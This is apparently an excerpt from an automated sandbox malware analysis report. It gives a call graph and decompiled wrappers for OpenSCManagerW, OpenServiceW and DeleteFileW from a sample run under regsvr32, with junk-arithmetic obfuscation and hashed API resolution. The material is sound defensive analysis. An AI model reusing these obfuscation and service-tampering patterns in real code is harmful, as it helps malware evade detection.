4407->4408 4408->4316 4409->4404 4411 304ea8 4410->4411 4412 31fd42 GetPEB 4411->4412 4413 304f5a 4412->4413 4413->4375 4415 31fe31 4414->4415 4416 307f78 GetPEB 4415->4416 4417 31feb7 4416->4417 4417->4384 4419 31cf1e 4418->4419 4420 307f78 GetPEB 4419->4420 4421 31cf8b 4420->4421 4421->4384 4423 30503a 4422->4423 4424 307f78 GetPEB 4423->4424 4425 3050b4 4424->4425 4425->4384 4427 304f81 4426->4427 4428 307f78 GetPEB 4427->4428 4429 304fff 4428->4429 4429->4384 4431 30eb77 4430->4431 4432 307f78 GetPEB 4431->4432 4433 30ebfc 4432->4433 4433->4384 4435 316cc5 4434->4435 4436 307f78 GetPEB 4435->4436 4437 316d2a 4436->4437 4437->4316 4443 317e55 4438->4443 4439 3180fa 4439->4327 4440 3180fc 4442 321ce8 GetPEB 4440->4442 4442->4439 4443->4439 4443->4440 4444 30303a 2 API calls 4443->4444 4445 321ce8 4443->4445 4444->4443 4446 321d0e 4445->4446 4447 307f78 GetPEB 4446->4447 4448 321d89 4447->4448 4448->4443 4450 30e508 4449->4450 4451 30303a 2 API calls 4450->4451 4452 30e5ee 4451->4452 4452->4339 4452->4452 4454 30ec31 4453->4454 4455 30adb7 GetPEB 4454->4455 4456 30ec4c 4455->4456 4456->4345 4458 30d385 4457->4458 4459 30adb7 GetPEB 4458->4459 4460 30d3a2 4459->4460 4460->4346 4462 303150 4461->4462 4463 307f78 GetPEB 4462->4463 4464 3031d5 4463->4464 4464->4348 4466 313d7e 4465->4466 4467 307f78 GetPEB 4466->4467 4468 313e01 4467->4468 4468->4348 4470 308db1 4469->4470 4471 307f78 GetPEB 4470->4471 4472 308e1f 4471->4472 4472->4348 4497 316361 4473->4497 4482 313831 4476->4482 4477 31394d 4479 313955 4477->4479 4480 3117d2 GetPEB 4477->4480 4479->4348 4480->4479 4481 30303a GetPEB RtlAllocateHeap 4481->4482 4482->4477 4482->4481 4483 31fd42 GetPEB 4482->4483 4484 3117d2 GetPEB 4482->4484 4501 3119b1 4482->4501 4483->4482 4484->4482 4486 30cb2d 4485->4486 4487 307f78 GetPEB 4486->4487 4488 30cba6 4487->4488 4488->4348 4490 3103ad 4489->4490 4491 307f78 GetPEB 4490->4491 4492 31041d 4491->4492 4492->4348 4494 31ecfa 4493->4494 4495 307f78 GetPEB 4494->4495 4496 31ed6b 4495->4496 4496->4359 4498 316388 4497->4498 4499 307f78 GetPEB 4498->4499 4500 306dcb 4499->4500 4500->4348 4502 3119d4 4501->4502 4503 307f78 GetPEB 4502->4503 4504 311a6e 4503->4504 4504->4482 4508 31a945 4505->4508 4506 320908 GetPEB 4506->4508 4507 31aed1 4509 3117d2 GetPEB 4507->4509 4508->4506 4508->4507 4510 31aecf 4508->4510 4511 30303a 2 API calls 4508->4511 4509->4510 4510->4367 4511->4508 4514 31df4c 4512->4514 4515 31af0b 2 API calls 4514->4515 4516 31e15e 4514->4516 4517 30a762 4514->4517 4515->4514 4516->4367 4518 30a791 4517->4518 4519 307f78 GetPEB 4518->4519 4520 30a812 4519->4520 4520->4514 4522 302279 4521->4522 4523 307f78 GetPEB 4522->4523 4524 3022ec 4523->4524 4524->3959 4536 3170c6 4525->4536 4526 317715 4526->3956 4527 317717 4545 306eb4 4527->4545 4531 321c9b GetPEB 4531->4536 4532 31f5d9 GetPEB RtlAllocateHeap 4532->4536 4533 31f94b GetPEB 4533->4536 4534 318eb3 GetPEB 4534->4536 4535 317098 2 API calls 4535->4536 4536->4526 4536->4527 4536->4531 4536->4532 4536->4533 4536->4534 4536->4535 4537 3227c2 4536->4537 4541 30ec5d 4536->4541 4538 3227db 4537->4538 4539 307f78 GetPEB 4538->4539 4540 32284c 4539->4540 4540->4536 4542 30ec73 4541->4542 4543 307f78 GetPEB 4542->4543 4544 30ecfc 4543->4544 4544->4536 4546 306eca 4545->4546 4547 307f78 GetPEB 4546->4547 4548 306f59 4547->4548 4548->4526 4551 301cb1 4549->4551 4552 301daf 4551->4552 4553 301db1 4551->4553 4638 313e89 4551->4638 4646 307013 4551->4646 4651 310231 4551->4651 4552->3969 4655 321be6 4553->4655 4558 30b6c5 4557->4558 4559 3226fc GetPEB 4558->4559 4560 30b9cb 4558->4560 4564 30b94d 4558->4564 4565 30b948 4558->4565 4566 3102d8 GetPEB CloseHandle 4558->4566 4568 320575 GetPEB 4558->4568 4572 302263 GetPEB 4558->4572 4576 31f5d9 2 API calls 4558->4576 4577 318eb3 GetPEB 4558->4577 4578 31f94b GetPEB 4558->4578 4671 313983 4558->4671 4679 319054 4558->4679 4683 3205f6 4558->4683 4690 3071e3 4558->4690 4700 32131d 4558->4700 4559->4558 4562 3102d8 2 API calls 4560->4562 4562->4565 4567 314e54 3 API calls 4564->4567 4565->3969 4566->4558 4569 30b983 4567->4569 4568->4558 4569->4565 4570 3102d8 2 API calls 4569->4570 4573 30b9a8 4570->4573 4572->4558 4575 3102d8 2 API calls 4573->4575 4575->4565 4576->4558 4577->4558 4578->4558 4727 308ce7 4580->4727 4582 30e08b 4583 3102d8 2 API calls 4582->4583 4584 317e3d 2 API calls 4582->4584 4585 314e54 3 API calls 4582->4585 4586 303466 2 API calls 4582->4586 4587 3117d2 GetPEB 4582->4587 4588 30e4cd 4582->4588 4589 310184 GetPEB 4582->4589 4591 320575 GetPEB 4582->4591 4592 30d467 GetPEB 4582->4592 4594 302263 GetPEB 4582->4594 4595 319054 GetPEB 4582->4595 4596 31f5d9 GetPEB RtlAllocateHeap 4582->4596 4597 318eb3 GetPEB 4582->4597 4598 31f94b GetPEB 4582->4598 4599 3205f6 3 API calls 4582->4599 4730 30a4de 4582->4730 4736 3168c8 4582->4736 4583->4582 4584->4582 4585->4582 4586->4582 4587->4582 4588->3969 4589->4582 4591->4582 4592->4582 4594->4582 4595->4582 4596->4582 4597->4582 4598->4582 4599->4582 4605 31701b 4600->4605 4601 31708b 4601->3969 4602 3079cc GetPEB 4602->4605 4603 3117d2 GetPEB 4603->4605 4604 321be6 GetPEB 4604->4605 4605->4601 4605->4602 4605->4603 4605->4604 4606 3102d8 2 API calls 4605->4606 4606->4605 4611 31a151 4607->4611 4608 303466 2 API calls 4608->4611 4609 31a36e 4609->3969 4610 320575 GetPEB 4610->4611 4611->4608 4611->4609 4611->4610 4612 302263 GetPEB 4611->4612 4613 319054 GetPEB 4611->4613 4614 31f94b GetPEB 4611->4614 4615 31f5d9 GetPEB RtlAllocateHeap 4611->4615 4616 314e54 3 API calls 4611->4616 4617 318eb3 GetPEB 4611->4617 4618 3205f6 3 API calls 4611->4618 4612->4611 4613->4611 4614->4611 4615->4611 4616->4611 4617->4611 4618->4611 4620 30c3cc 4619->4620 4621 310231 GetPEB 4620->4621 4622 30c4cc 4620->4622 4623 313e89 GetPEB 4620->4623 4625 30c4ca 4620->4625 4626 307013 GetPEB 4620->4626 4621->4620 4624 321be6 GetPEB 4622->4624 4623->4620 4624->4625 4625->3969 4626->4620 4633 30999b 4627->4633 4628 314e54 3 API calls 4628->4633 4629 320575 GetPEB 4629->4633 4630 309aed 4630->3969 4631 302263 GetPEB 4631->4633 4632 319054 GetPEB 4632->4633 4633->4628 4633->4629 4633->4630 4633->4631 4633->4632 4634 31f5d9 2 API calls 4633->4634 4635 318eb3 GetPEB 4633->4635 4636 31f94b GetPEB 4633->4636 4637 3205f6 3 API calls 4633->4637 4634->4633 4635->4633 4636->4633 4637->4633 4639 313ea4 4638->4639 4640 314164 4639->4640 4659 30427c 4639->4659 4640->4551 4643 31fd42 GetPEB 4644 31411b 4643->4644 4644->4640 4645 31fd42 GetPEB 4644->4645 4645->4644 4649 30702a 4646->4649 4647 3071d4 4647->4551 4648 3031ea GetPEB 4648->4649 4649->4647 4649->4648 4663 321da1 4649->4663 4652 310256 4651->4652 4653 307f78 GetPEB 4652->4653 4654 3102c5 4653->4654 4654->4551 4656 321bf9 4655->4656 4667 31a873 4656->4667 4660 30429a 4659->4660 4661 307f78 GetPEB 4660->4661 4662 3042ff 4661->4662 4662->4640 4662->4643 4664 321dba 4663->4664 4665 307f78 GetPEB 4664->4665 4666 321e3b 4665->4666 4666->4649 4668 31a88e 4667->4668 4669 307f78 GetPEB 4668->4669 4670 31a906 4669->4670 4670->4552 4674 3139a7 4671->4674 4673 32131d GetPEB 4673->4674 4674->4673 4675 313b6a 4674->4675 4677 313b7f 4674->4677 4703 30cbbf 4674->4703 4707 31ec35 4674->4707 4678 3102d8 2 API calls 4675->4678 4677->4558 4678->4677 4680 31906e 4679->4680 4681 30cca2 GetPEB 4680->4681 4682 319163 4681->4682 4682->4558 4684 320618 4683->4684 4685 31a50a 2 API calls 4684->4685 4686 320876 4684->4686 4687 320863 4684->4687 4711 307e8a 4684->4711 4685->4684 4686->4558 4689 3102d8 2 API calls 4687->4689 4689->4686 4698 307223 4690->4698 4691 3125cd GetPEB 4691->4698 4692 30773f 4723 318e1d 4692->4723 4695 31f5d9 2 API calls 4695->4698 4696 30773d 4696->4558 4698->4691 4698->4692 4698->4695 4698->4696 4699 31f94b GetPEB 4698->4699 4715 3222f2 4698->4715 4719 3123c7 4698->4719 4699->4698 4701 307f78 GetPEB 4700->4701 4702 32139a 4701->4702 4702->4558 4704 30cbeb 4703->4704 4705 307f78 GetPEB 4704->4705 4706 30cc88 4705->4706 4706->4674 4708 31ec4c 4707->4708 4709 307f78 GetPEB 4708->4709 4710 31ecd5 4709->4710 4710->4674 4712 307eb1 4711->4712 4713 307f78 GetPEB 4712->4713 4714 307f13 4713->4714 4714->4684 4716 322310 4715->4716 4717 307f78 GetPEB 4716->4717 4718 3223a9 4717->4718 4718->4698 4720 312408 4719->4720 4721 307f78 GetPEB 4720->4721 4722 31247e 4721->4722 4722->4698 4724 318e30 4723->4724 4725 307f78 GetPEB 4724->4725 4726 318ea8 4725->4726 4726->4696 4728 307f78 GetPEB 4727->4728 4729 308d75 4728->4729 4729->4582 4734 30a504 4730->4734 4731 30303a 2 API calls 4731->4734 4732 30a73d 4733 304e8f GetPEB 4732->4733 4735 30a73b 4733->4735 4734->4731 4734->4732 4734->4735 4735->4582 4737 3168f7 4736->4737 4738 307f78 GetPEB 4737->4738 4739 31697d 4738->4739 4739->4582 4741 30d3d5 4740->4741 4742 307f78 GetPEB 4741->4742 4743 30d45b 4742->4743 4743->3977 4745 30c0ca 4744->4745 4746 307f78 GetPEB 4745->4746 4747 30c145 4746->4747 4747->3977 4749 320e0b 4748->4749 4750 307f78 GetPEB 4749->4750 4751 320e6a 4750->4751 4751->3985 4753 31266d 4752->4753 4754 307f78 GetPEB 4753->4754 4755 3126e4 4754->4755 4755->3985 4758 302312 4756->4758 4757 310430 GetPEB 4757->4758 4758->4757 4759 30303a 2 API calls 4758->4759 4760 3025ce 4758->4760 4761 302606 4758->4761 4759->4758 4770 310430 4760->4770 4761->3985 4764 307f78 GetPEB 4763->4764 4765 313e80 4764->4765 4765->3985 4767 307c8d 4766->4767 4768 307f78 GetPEB 4767->4768 4769 307cf8 4768->4769 4769->3985 4771 310463 4770->4771 4772 307f78 GetPEB 4771->4772 4773 3104eb 4772->4773 4773->4761 4775 31ee30 4774->4775 4776 307f78 GetPEB 4775->4776 4777 31eeb4 4776->4777 4777->3802 4779 316d86 4778->4779 4780 307f78 GetPEB 4779->4780 4781 316e0c 4780->4781 4781->3998 4783 303f7b 4782->4783 4785 3041f2 4783->4785 4786 30419a 4783->4786 4803 303dfb 4783->4803 4785->4006 4787 30e4f5 2 API calls 4786->4787 4788 3041ac 4787->4788 4794 313094 4788->4794 4793 31f94b GetPEB 4793->4785 4807 313c24 4794->4807 4796 3041b8 4799 307f31 4796->4799 4800 307f56 4799->4800 4801 30adb7 GetPEB 4800->4801 4802 3041db 4801->4802 4802->4793 4804 303e15 4803->4804 4805 307f78 GetPEB 4804->4805 4806 303e89 4805->4806 4806->4783 4808 313c40 4807->4808 4809 307f78 GetPEB 4808->4809 4810 3131d0 4809->4810 4810->4796 4811 31660b 4810->4811 4812 316638 4811->4812 4813 307f78 GetPEB 4812->4813 4814 3166b2 4813->4814 4814->4796 4816 303ed1 4815->4816 4817 307f78 GetPEB 4816->4817 4818 303f40 4817->4818 4818->4013 4820 317a94 4819->4820 4821 307f78 GetPEB 4820->4821 4822 317b0d 4821->4822 4822->4013 4824 313cd4 4823->4824 4825 307f78 GetPEB 4824->4825 4826 313d50 4825->4826 4826->4013 4838 3186ee 4827->4838 4831 317bbf 4830->4831 4861 30bd6b 4831->4861 4836 3102d8 2 API calls 4837 317d95 4836->4837 4837->4026 4845 31871a 4838->4845 4841 318946 4842 3102d8 2 API calls 4841->4842 4843 30caf4 4842->4843 4843->4026 4845->4841 4845->4843 4847 30823e 4845->4847 4851 30be5e 4845->4851 4854 31fc9e 4845->4854 4858 3026a7 4845->4858 4848 308254 4847->4848 4849 307f78 GetPEB 4848->4849 4850 3082c4 4849->4850 4850->4845 4852 307f78 GetPEB 4851->4852 4853 30bed7 4852->4853 4853->4845 4855 31fcb7 4854->4855 4856 307f78 GetPEB 4855->4856 4857 31fd34 4856->4857 4857->4845 4859 311919 GetPEB 4858->4859 4860 3026f5 4859->4860 4860->4845 4862 307f78 GetPEB 4861->4862 4863 30bdda 4862->4863 4863->4837 4864 31f73b 4863->4864 4865 31f75d 4864->4865 4866 307f78 GetPEB 4865->4866 4867 317d83 4866->4867 4867->4836 4876 31e8c1 4868->4876 4869 31ea86 4871 3117d2 GetPEB 4869->4871 4870 30303a 2 API calls 4870->4876 4872 31ea97 4871->4872 4872->4040 4874 31f5d9 2 API calls 4874->4876 4875 32224c GetPEB 4875->4876 4876->4869 4876->4870 4876->4872 4876->4874 4876->4875 4877 31f94b GetPEB 4876->4877 4886 318ef8 4876->4886 4877->4876 4879 318d46 4878->4879 4880 318d5c 4878->4880 4879->4880 4881 3117d2 GetPEB 4879->4881 4880->4040 4881->4879 4883 30be04 4882->4883 4890 307d03 4883->4890 4887 318f15 4886->4887 4888 30303a 2 API calls 4887->4888 4889 319000 4888->4889 4889->4876 4897 307d1b 4890->4897 4894 307e65 4894->4040 4895 307e67 4896 3117d2 GetPEB 4895->4896 4896->4894 4897->4894 4897->4895 4898 30303a 2 API calls 4897->4898 4899 310503 4897->4899 4915 318d61 4897->4915 4920 302710 4897->4920 4898->4897 4914 3112cb 4899->4914 4900 312519 GetPEB 4900->4914 4906 31f5d9 GetPEB RtlAllocateHeap 4906->4914 4907 31a379 GetPEB 4907->4914 4908 3117c5 4908->4897 4910 31fd42 GetPEB 4910->4914 4912 30d2c9 GetPEB 4912->4914 4913 31f94b GetPEB 4913->4914 4914->4900 4914->4906 4914->4907 4914->4908 4914->4910 4914->4912 4914->4913 4929 30866c 4914->4929 4933 3164cf 4914->4933 4937 30ed0a 4914->4937 4951 30c98b 4914->4951 4955 31970d 4914->4955 4959 30a838 4914->4959 4963 30c01c 4914->4963 4916 3164cf GetPEB 4915->4916 4917 318e04 4916->4917 4918 3117d2 GetPEB 4917->4918 4919 318e16 4918->4919 4919->4897 4928 302d16 4920->4928 4921 302edc 4923 312519 GetPEB 4921->4923 4922 302eda 4922->4897 4923->4922 4924 31f5d9 GetPEB RtlAllocateHeap 4924->4928 4925 30866c GetPEB 4925->4928 4926 30d2c9 GetPEB 4926->4928 4927 31f94b GetPEB 4927->4928 4928->4921 4928->4922 4928->4924 4928->4925 4928->4926 4928->4927 4930 3086a1 4929->4930 4931 307f78 GetPEB 4930->4931 4932 308728 4931->4932 4932->4914 4934 3164e2 4933->4934 4935 307f78 GetPEB 4934->4935 4936 316555 4935->4936 4936->4914 4939 30fc94 4937->4939 4938 31014c 4941 312519 GetPEB 4938->4941 4939->4938 4940 31014a 4939->4940 4942 3117d2 GetPEB 4939->4942 4944 30303a 2 API calls 4939->4944 4945 30eb4b GetPEB 4939->4945 4946 31f5d9 GetPEB RtlAllocateHeap 4939->4946 4947 31f94b GetPEB 4939->4947 4948 310184 GetPEB 4939->4948 4949 30d2c9 GetPEB 4939->4949 4967 307a69 4939->4967 4971 31a42c 4939->4971 4940->4914 4941->4940 4942->4939 4944->4939 4945->4939 4946->4939 4947->4939 4948->4939 4949->4939 4952 30c9a7 4951->4952 4953 307f78 GetPEB 4952->4953 4954 30ca27 4953->4954 4954->4914 4956 31972f 4955->4956 4957 307f78 GetPEB 4956->4957 4958 31979e 4957->4958 4958->4914 4960 30a865 4959->4960 4961 307f78 GetPEB 4960->4961 4962 30a8e7 4961->4962 4962->4914 4964 30c035 4963->4964 4965 307f78 GetPEB 4964->4965 4966 30c0ac 4965->4966 4966->4914 4968 307a97 4967->4968 4969 307f78 GetPEB 4968->4969 4970 307b06 4969->4970 4970->4939 4972 31a461 4971->4972 4973 307f78 GetPEB 4972->4973 4974 31a4e8 4973->4974 4974->4939 4976 321a26 4975->4976 4977 3125cd GetPEB 4976->4977 4978 321b7b 4976->4978 4981 321b98 4976->4981 4999 3094d4 4976->4999 4977->4976 4995 3033b6 4978->4995 4981->4059 4984 30c83c 4982->4984 4983 31f5d9 2 API calls 4983->4984 4984->4983 4985 30c967 4984->4985 4986 303e99 GetPEB 4984->4986 4988 30c965 4984->4988 4989 31f94b GetPEB 4984->4989 5003 306c71 4984->5003 4987 313cbe GetPEB 4985->4987 4986->4984 4987->4988 4988->4059 4989->4984 4992 3035ca 4991->4992 4993 307f78 GetPEB 4992->4993 4994 303643 4993->4994 4994->4058 4996 3033d4 4995->4996 4997 307f78 GetPEB 4996->4997 4998 303453 4997->4998 4998->4981 5000 3094f1 4999->5000 5001 307f78 GetPEB 5000->5001 5002 30957c 5001->5002 5002->4976 5004 306c8e 5003->5004 5005 307f78 GetPEB 5004->5005 5006 306d06 5005->5006 5006->4984 5007 304313 5017 30484a 5007->5017 5009 30303a 2 API calls 5009->5017 5010 3117d2 GetPEB 5010->5017 5011 304a79 5012 3102d8 2 API calls 5011->5012 5014 304a77 5012->5014 5013 320575 GetPEB 5013->5017 5017->5009 5017->5010 5017->5011 5017->5013 5017->5014 5018 31a50a 2 API calls 5017->5018 5019 302263 GetPEB 5017->5019 5020 31eb61 5017->5020 5024 30bee4 5017->5024 5028 31487b 5017->5028 5018->5017 5019->5017 5021 31eb8f 5020->5021 5022 307f78 GetPEB 5021->5022 5023 31ec19 5022->5023 5023->5017 5025 30befd 5024->5025 5026 307f78 GetPEB 5025->5026 5027 30bf7c 5026->5027 5027->5017 5029 31488b 5028->5029 5030 307f78 GetPEB 5029->5030 5031 314902 5030->5031 5031->5017 5032 31f7f4 5033 31f8f9 5032->5033 5034 30e4f5 2 API calls 5033->5034 5039 31f93e 5033->5039 5035 31f90e 5034->5035 5040 309343 5035->5040 5038 31f94b GetPEB 5038->5039 5041 30935e 5040->5041 5043 3094a2 5041->5043 5044 319635 5041->5044 5043->5038 5045 31964e 5044->5045 5046 307f78 GetPEB 5045->5046 5047 3196c5 5046->5047 5047->5041 5048 316998 5049 302263 GetPEB 5048->5049 5050 316c12 5049->5050 5051 30bee4 GetPEB 5050->5051 5052 316c2b 5051->5052 5053 316c95 5052->5053 5054 31f5d9 2 API calls 5052->5054 5055 316c49 5054->5055 5056 318eb3 GetPEB 5055->5056 5057 316c70 5056->5057 5058 31f94b GetPEB 5057->5058 5059 316c83 5058->5059 5060 307bc6 2 API calls 5059->5060 5060->5053

                                                                                                                Executed Functions

                                                                                                                Function 00306E01 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 431 306e01-306eb3 call 30c98a call 307f78 OpenSCManagerW
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00306E01(void* __ecx, void* __edx, intOrPtr _a8, int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				short* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t36;
				void* _t46;
				signed int _t48;
				signed int _t49;

				_push(0);
				_push(_a12);
				_push(_a8);
				_push(0);
				E0030C98A(_t36);
				_v32 = 0x5e4691;
				_v28 = 0xb22c2d;
				_v24 = 0xd08f35;
				_v20 = 0;
				_v16 = 0x466167;
				_t48 = 0x37;
				_v16 = _v16 / _t48;
				_v16 = _v16 ^ 0x000b48c4;
				_v8 = 0x78b9b;
				_t49 = 0x12;
				_v8 = _v8 / _t49;
				_v8 = _v8 + 0x94cf;
				_v8 = _v8 ^ 0x0006a86d;
				_v12 = 0x7d284b;
				_v12 = _v12 + 0xfffff9ba;
				_v12 = _v12 ^ 0x007a5aaa;
				E00307F78(_t49, 0x616ae4, _t49, 0x10d, _t49, 0x2c4dea6c);
				_t46 = OpenSCManagerW(0, 0, _a12); // executed
				return _t46;
			}














                                                                                                                0x00306e0a
                                                                                                                0x00306e0b
                                                                                                                0x00306e0e
                                                                                                                0x00306e11
                                                                                                                0x00306e14
                                                                                                                0x00306e1c
                                                                                                                0x00306e23
                                                                                                                0x00306e2c
                                                                                                                0x00306e33
                                                                                                                0x00306e36
                                                                                                                0x00306e42
                                                                                                                0x00306e47
                                                                                                                0x00306e4c
                                                                                                                0x00306e53
                                                                                                                0x00306e5d
                                                                                                                0x00306e65
                                                                                                                0x00306e6d
                                                                                                                0x00306e74
                                                                                                                0x00306e7b
                                                                                                                0x00306e82
                                                                                                                0x00306e89
                                                                                                                0x00306ea0
                                                                                                                0x00306ead
                                                                                                                0x00306eb3

                                                                                                                APIs
                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00306EAD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ManagerOpen
                                                                                                                • String ID: K(}$gaF$ja
                                                                                                                • API String ID: 1889721586-538739611
                                                                                                                • Opcode ID: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction ID: 4add2b2526553d604ed54c245a6b10de2cd945fc37b3a1cee01dff88c528c953
                                                                                                                • Opcode Fuzzy Hash: 2bfe91f83e54762a76626f5005161e2236a064a7b9ce61c9eebc5f4be2cd1f3e
                                                                                                                • Instruction Fuzzy Hash: E61155B2D01218BBDB04DFA5C8498DEBFB6EF45314F10C189FA18AB281D7B55B259F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00308E38 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50serviceCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 545 308e38-308ee4 call 30c98a call 307f78 OpenServiceW
                                                                                                                C-Code - Quality: 73%
                                                                                                                			E00308E38(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t37;
				void* _t46;
				signed int _t48;
				int _t53;

				_push(_a16);
				_t53 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0030C98A(_t37);
				_v12 = 0x1c994a;
				_v12 = _v12 << 3;
				_v12 = _v12 + 0xffff2161;
				_v12 = _v12 | 0xd2ae04c7;
				_v12 = _v12 ^ 0xd2e10dca;
				_v8 = 0x3225a3;
				_v8 = _v8 + 0xb485;
				_t48 = 0x24;
				_v8 = _v8 / _t48;
				_v8 = _v8 + 0x1169;
				_v8 = _v8 ^ 0x000adbd5;
				_v16 = 0x918fbd;
				_v16 = _v16 * 0x4a;
				_v16 = _v16 ^ 0x2a1cf10f;
				E00307F78(_t48, 0x616ae4, _t48, 0xe4, _t48, 0x7315a644);
				_t46 = OpenServiceW(_a16, _a12, _t53); // executed
				return _t46;
			}










                                                                                                                0x00308e3f
                                                                                                                0x00308e42
                                                                                                                0x00308e44
                                                                                                                0x00308e47
                                                                                                                0x00308e4a
                                                                                                                0x00308e4e
                                                                                                                0x00308e4f
                                                                                                                0x00308e54
                                                                                                                0x00308e5e
                                                                                                                0x00308e64
                                                                                                                0x00308e6b
                                                                                                                0x00308e72
                                                                                                                0x00308e79
                                                                                                                0x00308e80
                                                                                                                0x00308e8c
                                                                                                                0x00308e94
                                                                                                                0x00308e9c
                                                                                                                0x00308ea3
                                                                                                                0x00308eaa
                                                                                                                0x00308ebc
                                                                                                                0x00308ebf
                                                                                                                0x00308ecf
                                                                                                                0x00308ede
                                                                                                                0x00308ee4

                                                                                                                APIs
                                                                                                                • OpenServiceW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00308EDE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: OpenService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 3098006287-1100367487
                                                                                                                • Opcode ID: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction ID: a9d7199d19425bf4b7dcd9ee08feebe8c81b20735eac681f44aea2235bd8e12d
                                                                                                                • Opcode Fuzzy Hash: 26f022fb4ad9c5f77b79696659ed6dd336b5c8a1a307204dd2595fd88902adc4
                                                                                                                • Instruction Fuzzy Hash: 2D112271E01208FBEF05DFA4DA4A8DEBFB6EB05314F10C189E914A6250E7B55B209F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00307BC6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49fileCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 550 307bc6-307c79 call 30c98a call 307f78 DeleteFileW
                                                                                                                C-Code - Quality: 94%
                                                                                                                			E00307BC6(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t42;
				int _t52;
				signed int _t54;
				signed int _t55;

				_push(_a4);
				E0030C98A(_t42);
				_v24 = _v24 & 0x00000000;
				_v20 = _v20 & 0x00000000;
				_v28 = 0xa8f244;
				_v16 = 0x845cf1;
				_t54 = 0x49;
				_v16 = _v16 / _t54;
				_v16 = _v16 | 0x150b5070;
				_v16 = _v16 ^ 0x15045549;
				_v12 = 0xcbfb15;
				_v12 = _v12 ^ 0x1a866322;
				_v12 = _v12 + 0xffff3502;
				_v12 = _v12 ^ 0x1a48e6f8;
				_v8 = 0xe2385a;
				_v8 = _v8 | 0xfdf9d9f4;
				_t55 = 0x6e;
				_v8 = _v8 / _t55;
				_v8 = _v8 + 0xffffa480;
				_v8 = _v8 ^ 0x02430dde;
				E00307F78(_t55, 0xbd3f148a, _t55, 0x1c4, _t55, 0x5b4e8958);
				_t52 = DeleteFileW(_a4); // executed
				return _t52;
			}













                                                                                                                0x00307bcc
                                                                                                                0x00307bd1
                                                                                                                0x00307bd6
                                                                                                                0x00307bdd
                                                                                                                0x00307be3
                                                                                                                0x00307bea
                                                                                                                0x00307bf6
                                                                                                                0x00307bfb
                                                                                                                0x00307c00
                                                                                                                0x00307c07
                                                                                                                0x00307c0e
                                                                                                                0x00307c15
                                                                                                                0x00307c1c
                                                                                                                0x00307c23
                                                                                                                0x00307c2a
                                                                                                                0x00307c31
                                                                                                                0x00307c3b
                                                                                                                0x00307c43
                                                                                                                0x00307c4b
                                                                                                                0x00307c52
                                                                                                                0x00307c69
                                                                                                                0x00307c74
                                                                                                                0x00307c79

                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNEL32(1A48E6F8), ref: 00307C74
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000005.00000002.451757926.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                • Associated: 00000005.00000002.451751266.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000005.00000002.451836808.0000000000324000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_5_2_300000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: ddc9f9dc7aeb3c496f0817031976a3b4ee156204c4db46c9805cccf186266703
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
